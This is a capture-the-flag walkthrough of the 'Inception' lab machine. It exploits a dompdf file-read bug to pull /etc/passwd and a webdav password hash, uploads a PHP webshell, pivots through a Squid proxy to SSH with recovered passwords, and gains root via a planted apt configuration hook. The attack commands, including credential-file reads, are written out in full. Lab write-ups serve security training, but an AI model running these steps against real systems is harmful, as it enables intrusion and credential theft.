Inception
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.67 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,3128 10.10.10.67 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
The website doesn't show anything interesting.
But if we check at the bottom of the source code, we'll see a comment saying something about dompdf.
If we go to /dompdf, we'll see that directory listing is enabled and we'll be able to see some files.
Exploitation
There is one Arbitrary File Read vulnerability that affects this software. We could read local files using the input_file parameter. We will have to base64 decode the output.
curl -s "http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd" | grep -oP '(.*?)' | tail -n 1 | tr -d "()" | base64 -d
There is one user called cobb. Other files we could get are the Apache2 configuration file.
curl -s "http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf" | grep -oP '(.*?)' | tail -n 1 | tr -d "()" | base64 -d
There is a /webdav_test_inception subdirectory, and we'll see that it asks for credentials.
Note that there is an authorization file in the Apache2 configuration file. This file contains a hashed password for the webdav_tester user.
curl -s "http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd" | grep -oP '(.*?)' | tail -n 1 | tr -d "()" | base64 -d
Put the hash in the hash file, and try to break it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
We get the password for the webdav_tester user. If we try to log in with these credentials we'll get a forbidden message.
Let's use davtest to see what permissions we have on the WebDAV server.
davtest -url http://10.10.10.67/webdav_test_inception/ -auth webdav_tester:babygurl69
As we can see, it is possible to upload and execute PHP files. Let's upload a PHP webshell to the server. First, create it.
nano pwn.php
Then upload it using PUT.
curl -s -X PUT http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/pwn.php -d @pwn.php
Now we can run commands using the uploaded webshell.
http://10.10.10.67/webdav_test_inception/pwn.php?cmd=whoami
We won't be able to get a reverse shell because there is a firewall blocking the connections. So we have to enumerate the server using the webshell. If we take a look into the /var/www/html directory, we'll see another one called wordpress_4.8.3.
http://10.10.10.67/webdav_test_inception/pwn.php?cmd=ls -la /var/www/html
Which has common WordPress files.
http://10.10.10.67/webdav_test_inception/pwn.php?cmd=ls -la /var/www/html/wordpress_4.8.3
The wp-config.php file contains credentials for the database.
view-source:http://10.10.10.67/webdav_test_inception/pwn.php?cmd=cat /var/www/html/wordpress_4.8.3/wp-config.php
There was also open the 3128 port, which is a Squid Proxy. If we try to access localhost using that proxy, we'll see that port 80 is open.
curl -s http://localhost -p http://10.10.10.67:3128 | html2text
But maybe there are other ports open that we can reach using this proxy. Let's use wfuzz to find it out.
wfuzz -c --hc=503 -t 200 -z range,1-65535 -p 10.10.10.67:3128:HTTP http://127.0.0.1:FUZZ
Port 22 is also open. We could try to log in as cobb using the database password we found earlier. We change the proxychains configuration file.
nano /etc/proxychains.conf
Now, we'll be able to log in via SSH as cobb. Then, we could grab the user flag.
proxychains -q sshpass -p 'VwPddNh7xMZyDQoByQL4' ssh cobb@localhost
Privilege Escalation
We are currently in a container because the machine has the 192.168.0.10 IP address.
ip a
Let's use my tool bnmap to do host and port discovery in this network. As connections are being blocked by a firewall, we need to base64 encode the script, copy it.
cat bnmap.sh | base64 -w 0 | xclip -sel clip
Then decode it in the server.
echo 'IyEvY...biIK' | base64 -d > bnamp.sh
Now, use the tool to scan the entire eth0 network interface.
bash bnmap.sh -i eth0
There is one machine with ports 21,22 and 53 open. Let's try to log in with SSH using the same credentials for cobb.
ssh cobb@192.168.0.1
Now we have access to the main machine. If we check the cron jobs, we'll see that root is updating the system every 5 minutes.
cat /etc/crontab
If we can create files in /etc/apt/apt.conf.d/ we have a way to become root. Let's create the malicious file with the following payload.
nano pwned
We won't be able to upload the malicious file using FTP.
ftp localhost
But we could try using TFTP.
tftp localhost
We created the file successfully.
ls -l /etc/apt/apt.conf.d/
Now, we need to wait for the cron job to be executed, and the /bin/bash binary will have SUID permissions. We could get a shell as root, and then all we have to do is reap the harvest and take the root flag.
bash -p
Last updated
Was this helpful?